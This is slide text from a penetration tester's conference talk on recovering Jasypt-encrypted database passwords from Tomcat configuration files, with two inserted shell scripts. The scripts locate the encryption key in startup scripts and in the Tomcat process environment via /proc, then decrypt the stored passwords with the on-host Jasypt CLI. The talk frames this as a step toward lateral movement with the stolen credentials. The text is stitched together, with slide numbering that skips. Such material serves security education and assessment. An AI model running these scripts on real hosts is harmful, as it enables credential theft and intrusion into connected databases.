2. DISCLAIMER
The views expressed in this talk are those of the author and do
not reflect the official policy or position of Trustwave
SpiderLabs.
3. BACKGROUND
Keith Lee
Senior Security Consultant
Trustwave SpiderLabs
@keith55
http://github.com/milo2012/
http://milo2012.wordpress.com/
https://www.linkedin.com/in/keithlee2012/
• Presented at
THOTCON, PHDays, Zeronights, Rootcon, DEFCON (Wall of Sheep, Skytalks, Demo
Labs), Blackhat Asia, HackInTheBox
4. OWASP GUIDE
Password Plaintext Storage
Storing a plaintext password in a configuration file allows
anyone who can read the file access to the password-protected
resource.
Developers sometimes believe that they cannot defend the
application from someone who has access to the configuration,
but this attitude makes an attacker's job easier.
Good password management guidelines require that a
password never be stored in plaintext.
[https://www.owasp.org/index.php/Password_Plaintext_Storage]
5. TOMCAT AND JAVA SERVLET
Apache Tomcat
Apache Tomcat (in this context) is a servlet container.
The container is responsible for managing the lifecycle of servlets,
mapping a URL to a particular servlet and ensuring that the URL
requester has the correct access rights.
Java Servlet
A Java servlet is a Java program that extends the capabilities of a
server.
Servlets most commonly implement applications hosted on web servers.
6. WHAT IS JASYPT?
Jasypt (Java Simplified Encryption)
Jasypt is a Java library that lets a developer add basic
encryption capabilities to a project with minimum effort, and
without needing deep knowledge of how cryptography works.
12. IMPORTANT FILES FOR TOMCAT/JAVA SERVLETS
- context.xml (application-specific settings): data source definitions
(server names, database names, usernames, passwords)
13. IMPORTANT FILES FOR TOMCAT/JAVA SERVLETS
- catalina.properties (class loader paths, security package lists, some
tunable performance properties, custom properties such as the PROPERTY_SOURCE hook and the encrypted values behind placeholders)
14. THOUGHT PROCESS
Understand how things work
Decrypt the passwords
Find the missing pieces
(keys, passwords, usernames, DB locations, etc.)
Find sensitive data in the database
Move laterally and vertically in the network
using the newly found credentials
Don’t run away just because you see encrypted passwords
If you already ‘own’ the host, you should have
everything you need to decrypt them
15. HOW JASYPT WORKS
Purpose
• Encrypt clear-text credentials in configuration files
• Uses password-based symmetric encryption: the same secret key encrypts and decrypts the passwords
Encryption steps
• Extract the properties such as server names, databases and user credentials into a separate
property file
• Replace the credentials in the configuration files with ‘property placeholders’
• Use the Jasypt CLI utility to encrypt each password with a predetermined key
• Store the placeholder definitions and the encrypted passwords in a properties file (e.g.
catalina.properties)
Decryption steps
• The decryption key is supplied at runtime, via an environment variable or entered manually
• The properties file is read and the placeholders are replaced with the decrypted values
16. CONTEXT.XML FILE BEFORE AND AFTER JASYPT
Before encryption with Jasypt
<Context>
<Resource name="jdbc/serviceDB" auth="Container" type="javax.sql.DataSource"
driverClassName="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://db01;database=service_prd" username="dbadmin" password="Password1"/>
</Context>
After encryption with Jasypt
• The plaintext password is replaced by a property placeholder; Tomcat resolves ${db.password} at startup through the configured PropertySource, which decrypts the value stored in the properties file
<Context>
<Resource name="jdbc/serviceDB" auth="Container" type="javax.sql.DataSource"
driverClassName="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://db01;database=service_prd" username="dbadmin" password="${db.password}"/>
</Context>
17. IS JASYPT USED ON THE TOMCAT SERVER?
$ find / -name 'jasypt-*.jar' 2>/dev/null
/data/tomcat/service01/lib/jasypt-1.9.2.jar
$ cat /data/tomcat/service01/conf/context.xml
<Context>
<Resource name="jdbc/serviceDB" auth="Container" type="javax.sql.DataSource"
driverClassName="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://db01;database=service_prd" username="dbadmin" password="${db.password}"/>
</Context>
19. JASYPT - LOADING THE KEY BEFORE RUNTIME
• system environment variable
(export APP_ENCRYPTION_PASSWORD=O8Z13Epg0Moai23q6M8z)
• web configuration (Jasypt's Web PBE configuration, where an operator enters the key through a web form after the application starts)
• a class that implements org.apache.tomcat.util.IntrospectionUtils.PropertySource.
Tomcat invokes this class to resolve each ${parameter} placeholder it finds while parsing
its XML configuration files.
20. THINKING LIKE A SYSADMIN/DEVELOPER
So what does this mean to an attacker?
The key must be conveniently located somewhere on the system.
Important considerations when using servlets and Jasypt
The servlets on the Tomcat server must survive a reboot.
Servlets must start up automatically.
It is just not feasible to manually enter the Jasypt encryption key after every reboot.
If the server goes down and doesn’t come back up immediately, it will affect my KPI.
21. HUNTING FOR THE PUZZLE PIECES
1. Encryption Key
2. Hostnames, Usernames, Password (place holders)
3. Encrypted passwords
22. HUNTING FOR THE PUZZLE PIECES
Encryption Key
Most commonly defined in an environment variable (easiest to implement)
Can be found in a number of places
- Environment variable of the running Tomcat process
- Startup scripts (setenv.sh, catalina.sh, init/systemd units)
- Hard-coded in classes on the classpath
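The hunt described on slides 17 through 22, as an added shell example that is not part of the talk: it checks for the Jasypt jar, lists the ${...} placeholders in Tomcat's XML configuration, reads the PROPERTY_SOURCE hook class and the encrypted value behind a placeholder from catalina.properties, and searches startup scripts and the live process environment for the key. The directory tree, file contents and the variable name APP_ENCRYPTION_PASSWORD are constructed to mirror the talk's listings; the ciphertext/key pair is the one from the talk's encrypt.sh run.

```shell
#!/bin/sh
# Added example, not from the talk: locate the three puzzle pieces on a
# Tomcat host. Tree, file contents and APP_ENCRYPTION_PASSWORD are constructed.

# Piece 0: is Jasypt on the classpath at all?
find_jasypt_jar() {              # $1 = CATALINA_BASE
    find "$1" -name 'jasypt-*.jar' 2>/dev/null
}

# Piece 2: every ${...} placeholder in Tomcat's XML configuration.
find_placeholders() {            # $1 = CATALINA_BASE
    grep -rhoE '\$\{[A-Za-z0-9_.-]+\}' "$1/conf" 2>/dev/null | sort -u
}

# The hook class Tomcat calls to resolve those placeholders, i.e. the class
# to decompile to learn where the key comes from.
find_property_source() {         # $1 = CATALINA_BASE
    sed -n 's/^org\.apache\.tomcat\.util\.digester\.PROPERTY_SOURCE=//p' \
        "$1/conf/catalina.properties" 2>/dev/null
}

# Piece 3: the encrypted value stored behind one placeholder name
# (dots in the name match any character, which is fine for a lookup).
property_value() {               # $1 = CATALINA_BASE, $2 = property name
    sed -n "s/^$2=//p" "$1/conf/catalina.properties" 2>/dev/null | head -n1
}

# Piece 1a: the key exported in startup scripts (setenv.sh, catalina.sh,
# init.d/systemd units); pass every directory worth searching.
key_from_scripts() {             # $1 = variable name, $2.. = directories
    var=$1; shift
    grep -rhoE "$var=[^[:space:]\"']+" "$@" 2>/dev/null | head -n1 | cut -d= -f2-
}

# Piece 1b: the key in the environment of the running Tomcat JVM
# (/proc/<pid>/environ is readable with the Tomcat uid or as root).
key_from_proc() {                # $1 = variable name
    for p in /proc/[0-9]*; do
        grep -q catalina "$p/cmdline" 2>/dev/null || continue
        tr '\0' '\n' < "$p/environ" 2>/dev/null | sed -n "s/^$1=//p" | head -n1
    done
}

# Constructed sample tree mirroring the talk's listings.
BASE=$(mktemp -d)
trap 'rm -rf "$BASE"' EXIT
mkdir -p "$BASE/conf" "$BASE/bin" "$BASE/lib"
: > "$BASE/lib/jasypt-1.9.2.jar"          # empty stand-in for the real jar
cat > "$BASE/conf/context.xml" <<'EOF'
<Context>
  <Resource name="jdbc/serviceDB" auth="Container" type="javax.sql.DataSource"
    url="jdbc:sqlserver://db01;database=service_prd"
    username="${db.user}" password="${db.password}"/>
</Context>
EOF
cat > "$BASE/conf/catalina.properties" <<'EOF'
org.apache.tomcat.util.digester.PROPERTY_SOURCE=com.orgname.tomcat.utils.EncryptedPropertySource
db.user=dbadmin
db.password=S4siv8IPYClnMPCg8GwNYzKZotISf78U
EOF
# The talk's encrypt.sh demo used password=1, so that is the key exported here.
printf 'export APP_ENCRYPTION_PASSWORD=1\n' > "$BASE/bin/setenv.sh"

echo "jar:             $(find_jasypt_jar "$BASE")"
echo "placeholders:    $(find_placeholders "$BASE" | tr '\n' ' ')"
echo "property source: $(find_property_source "$BASE")"
echo "db.password:     $(property_value "$BASE" db.password)"
echo "key (scripts):   $(key_from_scripts APP_ENCRYPTION_PASSWORD "$BASE/bin")"
echo "key (proc):      $(key_from_proc APP_ENCRYPTION_PASSWORD)"
```

Once find_property_source names the hook class, locate the jar that contains it with unzip -l over the jars in lib/ and decompile it (javap -c -p from a JDK, or any Java decompiler) to confirm where it reads the key; on a live target the proc search is usually the shortest path, since the JVM must have had the key in its environment to start.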
24. CATALINA.PROPERTIES
org.apache.tomcat.util.digester.PROPERTY_SOURCE=com.orgname.tomcat.utils.EncryptedPropertySource
‣ Sample catalina.properties entry: the class Tomcat calls to resolve ${...} placeholders
$ ls /data/tomcat/service01/lib/
jasypt-1.9.2.jar
tomcat-utils-1.0.1.jar
$ unzip tomcat-utils-1.0.1.jar
Archive: tomcat-utils-1.0.1.jar
inflating: META-INF/MANIFEST.MF
inflating: com/orgname/tomcat/utils/EncryptedPropertiesUtils.class
inflating: com/orgname/tomcat/utils/EncryptedPropertySource.class
creating: META-INF/maven/
‣ Searching the jars in lib/ for the class named by PROPERTY_SOURCE, i.e. the class Tomcat
invokes whenever it finds a ${parameter} placeholder in the XML files it parses.
25. TAKING A CLOSER LOOK AT DECRYPTION CLASS FILE
$ unzip tomcat-utils-1.0.1.jar
inflating: com/orgname/tomcat/utils/EncryptedPropertiesUtils.class
package com.orgname.tomcat.utils;

import org.jasypt.util.text.BasicTextEncryptor;

// Decrypts property values with Jasypt's BasicTextEncryptor (PBEWithMD5AndDES
// by default). The passphrase is read from the APP_ENCRYPTION_PASSWORD
// environment variable, so anyone who can read the Tomcat process environment
// has the key.
public class EncryptedPropertiesUtils
{
    private static String passPhrase;

    public static String decrypt(final String textToDecrypt) {
        loadPassPhrase();
        final BasicTextEncryptor textEncryptor = new BasicTextEncryptor();
        textEncryptor.setPassword(EncryptedPropertiesUtils.passPhrase);
        return textEncryptor.decrypt(textToDecrypt);
    }

    private static void loadPassPhrase() {
        String pp = System.getenv("APP_ENCRYPTION_PASSWORD");
        EncryptedPropertiesUtils.passPhrase = pp;
    }
}
‣ Sample decompiled source of EncryptedPropertiesUtils.class, the decryption helper in the jar
33. OTHER NOTES
$ ./encrypt.sh input=passwrod password=1
----ENVIRONMENT-----------------
Runtime: Oracle Corporation Java HotSpot(TM) 64-Bit Server VM 25.131-b11
----ARGUMENTS-------------------
input: passwrod
password: 1
----OUTPUT----------------------
S4siv8IPYClnMPCg8GwNYzKZotISf78U
Jasypt does not enforce a minimum length for the secret key: the one-character password above is accepted, so a recovered key may be trivially short.
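Decrypting with what is already on the host, as an added shell example that is not part of the talk: the jasypt jar ships the CLI class that the talk's encrypt.sh wraps, and its decryption counterpart takes the same input= and password= arguments. The jar path is an assumption (override it with JASYPT_JAR); the ciphertext/key pair and the banner format are taken from the talk's encrypt.sh run; the helper that decrypts a list of properties is illustrative.

```shell
#!/bin/sh
# Added example, not from the talk: decrypt Jasypt strings with the jasypt jar
# already present on the compromised host. JAR path is an assumption.

JAR=${JASYPT_JAR:-/data/tomcat/service01/lib/jasypt-1.9.2.jar}

# The CLI prints ENVIRONMENT/ARGUMENTS/OUTPUT sections; keep only the line
# that follows the ----OUTPUT---- separator.
cli_output() {
    sed -n '/^----OUTPUT/{n;p;}'
}

# Decrypt one value. The algorithm must match what encrypt.sh used;
# PBEWithMD5AndDES is Jasypt's default and what BasicTextEncryptor uses.
jasypt_decrypt() {               # $1 = ciphertext, $2 = key, $3 = algorithm
    java -cp "$JAR" org.jasypt.intf.cli.JasyptPBEStringDecryptionCLI \
        input="$1" password="$2" algorithm="${3:-PBEWithMD5AndDES}" | cli_output
}

# Decrypt every named property from a Tomcat properties file in one pass,
# e.g. the names behind the ${...} placeholders found in context.xml.
decrypt_properties() {           # $1 = properties file, $2 = key, $3.. = names
    file=$1; key=$2; shift 2
    for name in "$@"; do
        value=$(sed -n "s/^$name=//p" "$file" | head -n1)
        printf '%s=%s\n' "$name" "$(jasypt_decrypt "$value" "$key")"
    done
}

# Pair from the talk's encrypt.sh run: input=passwrod, password=1.
if command -v java >/dev/null 2>&1 && [ -f "$JAR" ]; then
    jasypt_decrypt S4siv8IPYClnMPCg8GwNYzKZotISf78U 1
else
    echo "java or $JAR not available; nothing decrypted" >&2
fi
```

If the CLI throws org.jasypt.exceptions.EncryptionOperationNotPossibleException, the key or the algorithm does not match what was used at encryption time; the algorithm, if changed from the default, is visible in the decompiled hook class or in the application's Jasypt configuration.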
34. IT'S BETTER THAN NO ENCRYPTION
[https://wiki.apache.org/tomcat/FAQ/Password]